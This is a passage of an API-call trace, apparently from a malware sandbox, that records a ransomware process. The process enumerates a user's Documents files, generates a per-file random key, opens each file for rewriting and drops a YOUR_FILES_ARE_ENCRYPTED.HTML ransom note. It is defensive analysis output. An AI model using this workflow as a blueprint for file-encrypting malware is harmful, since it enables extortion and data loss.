param_1=0x4ebda7e, param_2="%02X" | out: param_1="10") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="24") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="08") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4E") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="9F") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="44") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3C") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9B") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C7") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="04") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="0C") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="52") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A2") returned 2 [0166.799] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="4A") returned 2 [0166.800] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf" [0166.800] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.800] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.812] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x2b05a5f0, ftCreationTime.dwHighDateTime=0x1d7dc6f, ftLastAccessTime.dwLowDateTime=0x5dc13ae0, ftLastAccessTime.dwHighDateTime=0x1d7e755, ftLastWriteTime.dwLowDateTime=0x5dc13ae0, ftLastWriteTime.dwHighDateTime=0x1d7e755, nFileSizeHigh=0x0, nFileSizeLow=0xc387, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="MGINEBCK3IRXog.odt", cAlternateFileName="MGINEB~1.ODT")) returned 1 [0166.812] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt") returned 63 [0166.812] lstrcmpW (lpString1="MGINEBCK3IRXog.odt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.812] PathFindExtensionW (pszPath="MGINEBCK3IRXog.odt") returned=".odt" [0166.812] lstrlenW (lpString=".odt") returned 4 [0166.812] PathFindExtensionW (pszPath="MGINEBCK3IRXog.odt") returned=".odt" [0166.812] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\mginebck3irxog.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.813] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=50055) returned 1 [0166.813] GetProcessHeap () returned 0x270000 [0166.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.814] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="08") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E3") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="6F") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="EE") returned 
2 [0166.814] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="F6") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C8") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F3") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F5") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DE") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="89") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9B") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="87") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CE") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="8B") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="88") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="74") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EC") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="64") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E2") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="9E") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="61") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AC") returned 2 [0166.814] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="D7") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="2B") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C7") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | 
out: param_1="1D") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E2") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="56") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C0") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="57") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D6") returned 2 [0166.815] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2E") returned 2 [0166.815] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\MGINEBCK3IRXog.odt" [0166.815] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.815] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.823] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76bf98c0, ftCreationTime.dwHighDateTime=0x1d7e05c, ftLastAccessTime.dwLowDateTime=0xb7e045c0, ftLastAccessTime.dwHighDateTime=0x1d7e1ce, ftLastWriteTime.dwLowDateTime=0xb7e045c0, ftLastWriteTime.dwHighDateTime=0x1d7e1ce, nFileSizeHigh=0x0, nFileSizeLow=0x1868, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="sOHIcmDO58yppCBHY4.ods", cAlternateFileName="SOHICM~1.ODS")) returned 1 [0166.839] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods") returned 67 [0166.839] lstrcmpW (lpString1="sOHIcmDO58yppCBHY4.ods", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.839] PathFindExtensionW (pszPath="sOHIcmDO58yppCBHY4.ods") returned=".ods" [0166.839] lstrlenW (lpString=".ods") returned 4 [0166.840] PathFindExtensionW (pszPath="sOHIcmDO58yppCBHY4.ods") returned=".ods" [0166.840] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\sohicmdo58yppcbhy4.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.842] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=6248) returned 1 [0166.842] GetProcessHeap () returned 0x270000 [0166.842] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.843] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="FF") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D3") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="9B") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D0") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="55") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F9") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="22") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="10") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="09") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="AE") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: 
param_1="D2") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8A") returned 2 [0166.843] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="B5") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="37") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3C") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5C") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="F6") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="29") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AD") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F0") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="06") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3B") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="E2") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="ED") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="83") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="CD") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="BF") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="4E") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A5") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="03") returned 2 [0166.844] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="61") returned 2 [0166.845] lstrcpyW (in: 
lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods" [0166.845] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.845] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.855] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb68548c0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0xea371f30, ftLastAccessTime.dwHighDateTime=0x1d7e160, ftLastWriteTime.dwLowDateTime=0xea371f30, ftLastWriteTime.dwHighDateTime=0x1d7e160, nFileSizeHigh=0x0, nFileSizeLow=0x85f3, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="zQmD5wp.ppt", cAlternateFileName="")) returned 1 [0166.855] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt") returned 56 [0166.855] lstrcmpW (lpString1="zQmD5wp.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.855] PathFindExtensionW (pszPath="zQmD5wp.ppt") returned=".ppt" [0166.855] lstrlenW (lpString=".ppt") returned 4 [0166.855] PathFindExtensionW (pszPath="zQmD5wp.ppt") returned=".ppt" [0166.855] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\zqmd5wp.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.856] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=34291) returned 1 [0166.856] GetProcessHeap () returned 0x270000 [0166.856] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.857] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CA") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B4") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="57") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B9") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="22") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="86") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="24") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="20") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8E") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="8B") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CE") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="4F") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="24") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="93") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="21") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F5") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3A") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="30") returned 2 [0166.858] wsprintfW (in: 
param_1=0x4ebda7e, param_2="%02X" | out: param_1="AB") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="9F") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="81") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B4") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="94") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="7F") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="36") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A0") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="53") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E3") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="85") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E6") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="75") returned 2 [0166.859] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt" [0166.859] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.859] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.870] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xb68548c0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0xea371f30, ftLastAccessTime.dwHighDateTime=0x1d7e160, ftLastWriteTime.dwLowDateTime=0xea371f30, ftLastWriteTime.dwHighDateTime=0x1d7e160, nFileSizeHigh=0x0, nFileSizeLow=0x85f3, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="zQmD5wp.ppt", cAlternateFileName="")) returned 0 [0166.870] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0166.871] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0166.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0166.871] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0166.874] CloseHandle (hObject=0x5ac) returned 1 [0166.874] GetProcessHeap () returned 0x270000 [0166.875] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.875] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 
[0166.875] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\desktop.ini") returned 45 [0166.875] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.875] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.875] lstrlenW (lpString=".ini") returned 4 [0166.875] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.875] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5179ccc0, ftCreationTime.dwHighDateTime=0x1d7b0cd, ftLastAccessTime.dwLowDateTime=0xc85c0400, ftLastAccessTime.dwHighDateTime=0x1d7e4eb, ftLastWriteTime.dwLowDateTime=0xc85c0400, ftLastWriteTime.dwHighDateTime=0x1d7e4eb, nFileSizeHigh=0x0, nFileSizeLow=0xb2a7, dwReserved0=0x0, dwReserved1=0x60, cFileName="JLPz-3BpYDFP5A 5Ko1l.xlsx", cAlternateFileName="JLPZ-3~1.XLS")) returned 1 [0166.875] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx") returned 59 [0166.875] lstrcmpW (lpString1="JLPz-3BpYDFP5A 5Ko1l.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.875] PathFindExtensionW (pszPath="JLPz-3BpYDFP5A 5Ko1l.xlsx") returned=".xlsx" [0166.875] lstrlenW (lpString=".xlsx") returned 5 [0166.875] PathFindExtensionW (pszPath="JLPz-3BpYDFP5A 5Ko1l.xlsx") returned=".xlsx" [0166.875] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\jlpz-3bpydfp5a 5ko1l.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.876] 
GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=45735) returned 1 [0166.876] GetProcessHeap () returned 0x270000 [0166.876] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.877] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="B0") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="98") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="6A") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="C7") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="44") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A5") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="48") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A5") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E9") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="83") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="29") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="18") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="01") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="FE") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="83") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="A4") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="64") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="76") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="ED") returned 2 [0166.878] 
wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="8B") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6A") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="52") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="D9") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="F1") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="38") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="8C") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="AA") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="E1") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="FF") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="CB") returned 2 [0166.879] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="E6") returned 2 [0166.879] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="42") returned 2 [0166.879] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx" 